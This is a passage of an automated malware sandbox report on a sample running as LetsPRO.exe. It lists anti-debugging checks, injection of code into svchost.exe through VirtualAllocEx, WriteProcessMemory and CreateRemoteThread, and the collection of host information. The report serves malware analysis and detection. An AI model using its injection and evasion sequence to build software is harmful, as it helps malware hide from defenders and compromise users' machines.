                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandleJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPort
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPort
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPort
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPort
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPort
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPort
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPort
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPort
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPort
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugObjectHandle
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeProcess queried: DebugPort
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_025F8667 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_025F8667
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC9667A CreateFileW,GetFileAttributesExW,OutputDebugStringW,CloseHandle,GetLastError,WriteFile,30_2_6CC9667A
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C976D54 VirtualProtect ?,-00000001,00000104,?5_2_6C976D54
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F37490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,4_2_03F37490
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_004012C0 mov eax, dword ptr fs:[00000030h]4_2_004012C0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_004012D1 mov eax, dword ptr fs:[00000030h]4_2_004012D1
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00265217 mov eax, dword ptr fs:[00000030h]8_2_00265217
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_0025EDE2 mov eax, dword ptr fs:[00000030h]8_2_0025EDE2
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0001900A mov ecx, dword ptr fs:[00000030h]16_2_0001900A
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0001DE65 mov eax, dword ptr fs:[00000030h]16_2_0001DE65
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_0012D8C7 mov eax, dword ptr fs:[00000030h]30_2_0012D8C7
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_0012C11B mov ecx, dword ptr fs:[00000030h]30_2_0012C11B
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDEFAB3 mov eax, dword ptr fs:[00000030h]30_2_6CDEFAB3
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_00401244 GetProcessHeap,RtlAllocateHeap,4_2_00401244
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess token adjusted: Debug
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess token adjusted: Debug
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_025F8667 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_025F8667
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F3DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,4_2_03F3DF10
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F3F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_03F3F00A
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F41F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_03F41F67
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C97AEE4 _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,5_2_6C97AEE4
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C900837 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,5_2_6C900837
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 5_2_6C97C24F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,5_2_6C97C24F
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00258A28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00258A28
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_0025DAD2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0025DAD2
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00258E32 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00258E32
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00258FC5 SetUnhandledExceptionFilter,8_2_00258FC5
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_000158B2 SetUnhandledExceptionFilter,16_2_000158B2
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_00015B6F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00015B6F
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0001C4FA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0001C4FA
                  Source: C:\Program Files (x86)\ChromeSetup.exeCode function: 16_2_0001571F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0001571F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_00127825 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_00127825
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_0012755D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_0012755D
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_001279BB SetUnhandledExceptionFilter,30_2_001279BB
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_0012BA61 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_0012BA61
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDC21B3 FreeLibrary,FreeLibrary,FreeLibrary,EnterCriticalSection,SetUnhandledExceptionFilter,__set_purecall_handler,_Deallocate,LeaveCriticalSection,RtlDeleteCriticalSection,ReleaseSemaphore,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,RtlDeleteCriticalSection,CloseHandle,CloseHandle,RtlDeleteCriticalSection,30_2_6CDC21B3
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDC1F0D CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,__set_purecall_handler,LeaveCriticalSection,30_2_6CDC1F0D
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDD6B01 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_6CDD6B01
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDC2443 SetUnhandledExceptionFilter,__set_purecall_handler,LeaveCriticalSection,30_2_6CDC2443
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDD6737 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,30_2_6CDD6737
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDC23D6 EnterCriticalSection,SetUnhandledExceptionFilter,__set_purecall_handler,30_2_6CDC23D6
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CDDCEFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,30_2_6CDDCEFC

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Contains functionality to inject code into remote processes
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F377E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,4_2_03F377E0
                  Contains functionality to inject threads in other processes
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: 4_2_03F377E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,4_2_03F377E0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe4_2_03F377E0
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe4_2_03F377E0
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC9975D SetForegroundWindow,ShellExecuteExW,AllowSetForegroundWindow,GetLastError,SetLastError,GetLastError,DestroyWindow,SetLastError,30_2_6CC9975D
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"Jump to behavior
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeProcess created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript C:\Users\user\99944\144977.vbs
                  Source: C:\Program Files (x86)\ChromeSetup.exeProcess created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe c:\windows\systemtemp\gumbc12.tmp\googleupdate.exe /installsource taggedmi /install "appguid={8a69d345-d564-463c-aff1-a69d9e530f96}&iid={852d075a-cb9d-6360-4e4d-427bbb4f11e1}&lang=zh-cn&browser=3&usagestats=1&appname=google%20chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"
                  Source: C:\Program Files (x86)\ChromeSetup.exeProcess created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe c:\windows\systemtemp\gumbc12.tmp\googleupdate.exe /installsource taggedmi /install "appguid={8a69d345-d564-463c-aff1-a69d9e530f96}&iid={852d075a-cb9d-6360-4e4d-427bbb4f11e1}&lang=zh-cn&browser=3&usagestats=1&appname=google%20chrome&needsadmin=prefers&ap=x64-stable-statsdef_1&installdataindex=empty"Jump to behavior
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CC97C7F GetSecurityDescriptorDacl,SetSecurityDescriptorDacl,30_2_6CC97C7F
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeCode function: 30_2_6CCA3BF4 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,30_2_6CCA3BF4
                  Source: LetsPRO.exe, 00000004.00000003.2865605230.0000000005023000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.2865471845.0000000005023000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 minProgram Manager
                  Source: LetsPRO.exe, 00000004.00000002.3274006003.0000000005023000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inProgram Manager
                  Source: LetsPRO.exe, 00000004.00000003.3238092510.0000000005023000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000004.00000003.3043194092.0000000005023000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0 minProgram Managert
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exeCode function: 8_2_00258C8B cpuid 8_2_00258C8B
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW,4_2_03F35430
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,5_2_6C9088CA
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,free,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,_malloc_crt,_malloc_crt,free,__recalloc_crt,__recalloc_crt,_strlen,_calloc_crt,_strlen,strcpy_s,SetEnvironmentVariableA,_errno,free,free,__invoke_watson,5_2_6C9084A8
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,5_2_6C9085EC
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,5_2_6C906630
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,5_2_6C90875C
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_6C97F4C7
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,_stricmp,_TestDefaultLanguage,5_2_6C97F407
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_6C97F52E
